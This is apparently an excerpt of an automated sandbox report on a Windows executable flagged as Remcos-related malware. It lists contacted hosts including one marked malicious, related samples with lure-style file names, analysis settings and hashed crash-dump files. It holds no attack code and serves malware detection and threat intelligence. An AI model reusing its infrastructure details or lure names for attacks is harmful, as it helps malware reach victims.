                  http://geoplugin.net/json.gpn.net/json.gppsBiU282bjyR.exe, 00000000.00000003.384506320.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638122231.0000000000806000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://geoplugin.net/jBiU282bjyR.exe, 00000000.00000003.384506320.0000000000816000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638122231.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  212.23.211.238
                  unknownunknown
                  12329TMRDEtrue
                  178.237.33.50
                  geoplugin.netNetherlands
                  8455ATOM86-ASATOM86NLfalse
                  Joe Sandbox Version:38.0.0 Beryl
                  Analysis ID:1301172
                  Start date and time:2023-08-31 17:56:07 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 8m 3s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:41
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:BiU282bjyR.exe
                  Original Sample Name:111355b58d38248c4f0d96a509ca44e5.exe
                  Detection:MAL
                  Classification:mal100.rans.troj.spyw.expl.evad.winEXE@13/38@1/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 36.8% (good quality ratio 35%)
                  • Quality average: 81.8%
                  • Quality standard deviation: 25.5%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 30
                  • Number of non-executed functions: 213
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, eudb.ris.api.iris.microsoft.com, tse1.mm.bing.net, displaycatalog.mp.microsoft.com, g.bing.com, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: BiU282bjyR.exe
                  No simulations
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  178.237.33.50xcT2F1D2owcd.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  SecuriteInfo.com.W32.ModiLoader.WG.tr.22779.8690.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • geoplugin.net/json.gp
                  HSBC_TT_PAYMENT_INVOICE_201.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  Gfbeynjyz.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  SecuriteInfo.com.Win32.DropperX-gen.25669.16625.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • geoplugin.net/json.gp
                  SecuriteInfo.com.W32.ModiLoader.WG.tr.2843.17060.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • geoplugin.net/json.gp
                  DxqQQ2WfeF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • geoplugin.net/json.gp
                  Factura_con_IVA.docGet hashmaliciousRemcos, DBatLoaderBrowse
                  • geoplugin.net/json.gp
                  SecuriteInfo.com.Win32.DropperX-gen.32114.5392.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • geoplugin.net/json.gp
                  SecuriteInfo.com.Trojan.PackedNET.738.32297.32442.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  SecuriteInfo.com.FileRepMalware.18185.9184.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  SecuriteInfo.com.Win32.KeyloggerX-gen.21639.22575.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  file.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  dl1mXQH1HM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • geoplugin.net/json.gp
                  BOQ-Al Gurg Automation Project.exeGet hashmaliciousDBatLoader, RemcosBrowse
                  • geoplugin.net/json.gp
                  BOQ-Al Gurg Automation Project.exeGet hashmaliciousDBatLoader, RemcosBrowse
                  • geoplugin.net/json.gp
                  Scanned_by_Xerox_B230_Printer.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • geoplugin.net/json.gp
                  HUGHED234ED.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  Dieselmotorers.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp
                  Iawyncsnbpsnnl.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • geoplugin.net/json.gp
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  geoplugin.netxcT2F1D2owcd.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.W32.ModiLoader.WG.tr.22779.8690.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  HSBC_TT_PAYMENT_INVOICE_201.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  Gfbeynjyz.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.Win32.DropperX-gen.25669.16625.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.W32.ModiLoader.WG.tr.2843.17060.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  DxqQQ2WfeF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  Factura_con_IVA.docGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.Win32.DropperX-gen.32114.5392.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.Trojan.PackedNET.738.32297.32442.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.FileRepMalware.18185.9184.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.Win32.KeyloggerX-gen.21639.22575.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  file.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  dl1mXQH1HM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  BOQ-Al Gurg Automation Project.exeGet hashmaliciousDBatLoader, RemcosBrowse
                  • 178.237.33.50
                  BOQ-Al Gurg Automation Project.exeGet hashmaliciousDBatLoader, RemcosBrowse
                  • 178.237.33.50
                  Scanned_by_Xerox_B230_Printer.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  HUGHED234ED.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  Dieselmotorers.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  Pago_Banco_Estado__Swift_copy.bat.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  TMRDEhttps://ipfs.io/ipfs/QmdTwDBzfv7vcTnw34YZhB4VroSotz2NY5Hc5FzzQX8qxQ#rramis@isciii.esGet hashmaliciousHTMLPhisherBrowse
                  • 212.23.144.169
                  wx7x7YkSI8.elfGet hashmaliciousUnknownBrowse
                  • 185.249.170.212
                  2DLd2J82an.elfGet hashmaliciousMiraiBrowse
                  • 212.23.154.151
                  5vFyCZCGL7.elfGet hashmaliciousUnknownBrowse
                  • 212.23.212.254
                  Remittance_ACH_20220630.HTMLGet hashmaliciousUnknownBrowse
                  • 212.23.201.50
                  JIzNxwvQm7.dllGet hashmaliciousWannacryBrowse
                  • 212.23.152.51
                  9YQ4q9wIEn.dllGet hashmaliciousWannacryBrowse
                  • 62.221.232.243
                  4EYEHNO35o.exeGet hashmaliciousUnknownBrowse
                  • 212.23.202.95
                  jJZlHQhj5F.exeGet hashmaliciousUnknownBrowse
                  • 212.23.202.95
                  Factura0522.lnkGet hashmaliciousUnknownBrowse
                  • 212.23.221.7
                  ZhtkM8DmjwGet hashmaliciousMiraiBrowse
                  • 185.245.176.163
                  vYwp8FNhH1Get hashmaliciousMiraiBrowse
                  • 185.245.176.192
                  VUpggVyNKXGet hashmaliciousMiraiBrowse
                  • 185.245.176.185
                  arm5Get hashmaliciousMirai MoobotBrowse
                  • 185.11.56.21
                  ATOM86-ASATOM86NLxcT2F1D2owcd.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.W32.ModiLoader.WG.tr.22779.8690.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  HSBC_TT_PAYMENT_INVOICE_201.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  Gfbeynjyz.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.Win32.DropperX-gen.25669.16625.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.W32.ModiLoader.WG.tr.2843.17060.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  DxqQQ2WfeF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  Factura_con_IVA.docGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.Win32.DropperX-gen.32114.5392.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.Trojan.PackedNET.738.32297.32442.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.FileRepMalware.18185.9184.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.Win32.KeyloggerX-gen.21639.22575.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  UE3kTijL0W.elfGet hashmaliciousMiraiBrowse
                  • 85.222.236.214
                  file.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  dl1mXQH1HM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  BOQ-Al Gurg Automation Project.exeGet hashmaliciousDBatLoader, RemcosBrowse
                  • 178.237.33.50
                  BOQ-Al Gurg Automation Project.exeGet hashmaliciousDBatLoader, RemcosBrowse
                  • 178.237.33.50
                  Scanned_by_Xerox_B230_Printer.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  HUGHED234ED.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  Dieselmotorers.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):1.0408464911485655
                  Encrypted:false
                  SSDEEP:192:zj6LHJsAnbcAvjljA4dKwf/u7sUS274ItZ:zj6rJsAnbcAvj//u7sUX4ItZ
                  MD5:B32D3AD91DF17460286D5E5DC51D5D58
                  SHA1:0521E27702D58CBF2CD393B5C59D3E49974AA977
                  SHA-256:98DE4925F169074B3CAB6FD426D016404340475DFA497ABC50CF630E33C7E527
                  SHA-512:A4E0CB7993A3E039C18E00A5EF1782FB9032EFABDB1505866E7FFCC0CD76B756E9C25F65A91877E82F2A29750AD410C35A2F79B48C3770CBFBD91CA3B63F5A8C
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.9.7.1.0.2.9.3.6.7.0.5.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.e.5.c.1.8.6.-.f.0.2.0.-.4.0.7.0.-.a.a.f.d.-.7.f.d.0.4.b.2.1.7.f.3.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.9.2.7.0.0.8.-.f.7.3.c.-.4.8.6.9.-.9.d.8.b.-.5.b.d.2.4.b.d.b.f.8.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.i.U.2.8.2.b.j.y.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.2.7.-.c.8.8.3.-.2.d.c.6.2.3.d.c.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.f.4.c.7.e.7.3.6.0.7.1.3.7.f.8.b.2.d.e.9.a.3.5.1.7.b.9.7.3.b.0.0.0.0.0.9.0.4.!.0.0.0.0.2.4.c.5.d.3.1.5.9.a.f.9.d.9.9.2.a.0.a.2.6.3.6.8.c.f.6.5.b.a.3.1.3.f.3.e.8.b.e.4.!.B.i.U.2.8.2.b.j.y.R...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5./.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9724948957607432
                  Encrypted:false
                  SSDEEP:192:I63HJsAnbcAvjljA4dK+/u7sUS274ItZ:I6XJsAnbcAvjT/u7sUX4ItZ
                  MD5:9D2D93D0981636CE089D473E91E0BBBC
                  SHA1:F5E530F7E8BF3A7A3DEDAC73DBBCC8AFBF61D266
                  SHA-256:789E0907C537C7A3560DC4F977EB6E0BCB7F90EA3F8CBE4A1A2480C94BECAB3D
                  SHA-512:02E17522F3F32EAD1DC87DC4469D3A2C830766F2738A6614913E55E1708CF0134AF088CBA71E1C7B465DFA8630C038F7F412621B70396764D754F06853827BCC
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.9.7.1.0.2.5.1.1.8.0.0.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.4.4.6.2.2.5.-.b.4.b.7.-.4.0.4.b.-.a.3.3.1.-.9.7.9.3.4.e.3.2.1.1.c.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.3.f.b.b.e.8.-.3.b.b.8.-.4.a.2.d.-.a.2.d.d.-.4.7.d.9.7.7.d.0.4.4.a.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.i.U.2.8.2.b.j.y.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.2.7.-.c.8.8.3.-.2.d.c.6.2.3.d.c.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.f.4.c.7.e.7.3.6.0.7.1.3.7.f.8.b.2.d.e.9.a.3.5.1.7.b.9.7.3.b.0.0.0.0.0.9.0.4.!.0.0.0.0.2.4.c.5.d.3.1.5.9.a.f.9.d.9.9.2.a.0.a.2.6.3.6.8.c.f.6.5.b.a.3.1.3.f.3.e.8.b.e.4.!.B.i.U.2.8.2.b.j.y.R...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5./.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):1.0411022259407012
                  Encrypted:false
                  SSDEEP:192:pRB6WHJsAnbcAvjljA4dKwf/u7sUS274ItZ:pRB6OJsAnbcAvj//u7sUX4ItZ
                  MD5:3709A3E7CEA50FEBDECEAACAF85E47A3
                  SHA1:F2715AF9D8F943AF8C4C7A6EAA734E3E57E145EB
                  SHA-256:B95DF703E3940AD7CD6A25AFB23868B0F1F8BC523E06B8DBA12B8F2749BA802F
                  SHA-512:999291EBF2114726E37A3325B50D1E119BBBE19A8C67C683DAACB95B9A778433F5D54FF6F85A995BD912A066CCDD0B4868CEC562EB813CC0DD351BD73C64F780
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.9.7.1.0.3.8.3.6.1.7.9.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.2.8.9.d.f.f.-.6.3.f.6.-.4.1.6.b.-.8.9.7.1.-.5.6.c.9.1.3.8.9.2.b.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.6.6.6.6.1.a.-.5.8.1.4.-.4.1.d.7.-.8.f.d.0.-.5.5.b.f.0.8.6.d.b.1.2.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.i.U.2.8.2.b.j.y.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.2.7.-.c.8.8.3.-.2.d.c.6.2.3.d.c.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.f.4.c.7.e.7.3.6.0.7.1.3.7.f.8.b.2.d.e.9.a.3.5.1.7.b.9.7.3.b.0.0.0.0.0.9.0.4.!.0.0.0.0.2.4.c.5.d.3.1.5.9.a.f.9.d.9.9.2.a.0.a.2.6.3.6.8.c.f.6.5.b.a.3.1.3.f.3.e.8.b.e.4.!.B.i.U.2.8.2.b.j.y.R...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5./.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9882257921749451
                  Encrypted:false
                  SSDEEP:96:rz0t3K8QQ2oA7Jf6TpXIQcQnc6rCcEhcw3rr+HbHg/8BRTf3jFa9iVfNsGIMbJ3R:vq60H56rAjljA4dKD/u7sUS274ItZ
                  MD5:4A30BC7CA1BD57669E45B66F275D1469
                  SHA1:3EA5ABC22A0A8FE536C9FC768183C4239CDEAB7C
                  SHA-256:6DB876FDEF2737D83DFE69C84D79E6EE81F4001E8BE1D8305F3E1AB8EE975291
                  SHA-512:4BCAC0591B3FB106BBF3DE8E4C5764198AC152C08448C1E8B1C11C7CD43D5F40D52E68CA22F30D56F88EC67E8411BA54FA65ADAE79C4154B376B00B0E0D04BB0
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.9.7.1.0.2.7.1.3.0.1.9.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.6.2.8.4.7.7.-.5.8.7.e.-.4.8.d.c.-.9.a.b.4.-.a.1.8.5.a.f.5.3.2.b.3.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.d.1.8.9.e.b.-.e.6.f.b.-.4.4.0.f.-.8.e.4.2.-.5.3.8.b.5.a.4.f.7.5.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.i.U.2.8.2.b.j.y.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.2.7.-.c.8.8.3.-.2.d.c.6.2.3.d.c.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.f.4.c.7.e.7.3.6.0.7.1.3.7.f.8.b.2.d.e.9.a.3.5.1.7.b.9.7.3.b.0.0.0.0.0.9.0.4.!.0.0.0.0.2.4.c.5.d.3.1.5.9.a.f.9.d.9.9.2.a.0.a.2.6.3.6.8.c.f.6.5.b.a.3.1.3.f.3.e.8.b.e.4.!.B.i.U.2.8.2.b.j.y.R...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5./.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.973254441666543
                  Encrypted:false
                  SSDEEP:96:GyY3KqQQ2oA7Jf6TpXIQcQnc6rCcEhcw3rr+HbHg/8BRTf3jFa9iVfNsGIMbJ3V8:G6iH56rAjljA4dK+/u7sUS274ItZ
                  MD5:DCF8F52B2D0C35D5E83B249F8BD2DB1C
                  SHA1:EDEAA196578D822CB418387DCC909AB0F2710251
                  SHA-256:1940B97650E6A95AD6293E7A3C44D35009141E5B291FFB444F0C7FFDF8C3315D
                  SHA-512:138A18A8CC67FADC75B1595C7D5288288BC850D39CF6F7ED99817930812141DE4F2CE328055FCEEB66C72CD2BE235FFE54C13EC444C6E698EDE17433A08C5423
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.9.7.1.0.2.6.0.9.7.4.2.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.b.6.4.7.0.9.-.8.6.1.8.-.4.c.d.5.-.a.c.7.9.-.0.0.f.0.1.9.f.6.7.a.b.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.7.9.d.6.a.8.-.1.6.a.6.-.4.5.0.1.-.b.b.9.2.-.9.9.a.0.9.6.a.e.9.6.9.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.i.U.2.8.2.b.j.y.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.2.7.-.c.8.8.3.-.2.d.c.6.2.3.d.c.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.f.4.c.7.e.7.3.6.0.7.1.3.7.f.8.b.2.d.e.9.a.3.5.1.7.b.9.7.3.b.0.0.0.0.0.9.0.4.!.0.0.0.0.2.4.c.5.d.3.1.5.9.a.f.9.d.9.9.2.a.0.a.2.6.3.6.8.c.f.6.5.b.a.3.1.3.f.3.e.8.b.e.4.!.B.i.U.2.8.2.b.j.y.R...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5./.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):1.0409830531237236
                  Encrypted:false
                  SSDEEP:96:d2V3KrQQ2oA7Jf6TpXIQcQnc6rCcEhcw3rr+HbHg/8BRTf3jFa9iVfNsGIMbJ3Vd:sV6DH56rAjljA4dKwf/u7shS274ItZ
                  MD5:EC68CD86FCEB94B00149D47C0FF142A4
                  SHA1:B05BDB5D3E5458E24037F7CA7648256ACAF38DBF
                  SHA-256:35E546DCD29E6B43A5D1201BEFA04A342D3C4D316140EF6B4D1D1ECD5475E759
                  SHA-512:B0FBB2C0D2BA5ED7E6D2A4E65D3B6D0E7801C4B06131F9004F9D71B706107660198218AC345167DA37DF7892A34C56A17CD20D8C19FD87DE5BDAE47B21629CB3
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.9.7.1.0.6.7.2.3.9.8.3.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.5.6.e.5.8.f.-.0.2.5.b.-.4.9.3.a.-.a.b.1.1.-.6.0.4.b.a.4.1.a.9.2.1.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.1.7.1.d.2.8.9.-.b.e.e.4.-.4.c.8.9.-.8.8.1.1.-.3.4.7.b.2.d.0.c.0.4.1.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.i.U.2.8.2.b.j.y.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.2.7.-.c.8.8.3.-.2.d.c.6.2.3.d.c.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.f.4.c.7.e.7.3.6.0.7.1.3.7.f.8.b.2.d.e.9.a.3.5.1.7.b.9.7.3.b.0.0.0.0.0.9.0.4.!.0.0.0.0.2.4.c.5.d.3.1.5.9.a.f.9.d.9.9.2.a.0.a.2.6.3.6.8.c.f.6.5.b.a.3.1.3.f.3.e.8.b.e.4.!.B.i.U.2.8.2.b.j.y.R...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5./.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9730535345994372
                  Encrypted:false
                  SSDEEP:96:w1+dyg3K0QQ2oA7Jf6TpXIQcQnc6rCcEhcw3rr+HbHg/8BRTf3jFa9iVfNsGIMba:Lv6cH56rAjljA4dK+/u7sUS274ItZ
                  MD5:423585B85D386B6B58254747D86C738D
                  SHA1:2D18EEE3ADEC25DEEDF53619276D901B9AE87CA8
                  SHA-256:B369BF62E1C9E25C16D5407F58A2D78516EE9982857530EF7B07D8E8C4E655E7
                  SHA-512:3099AE6E3A1543709C4CA953112B8F186181484F43DF042DCD0A0F69B565377645EE2C9B129FB6B75AB8D82F977C695DEDDA78FD2DCA24E157791D769FDA12F0
                  Malicious:false
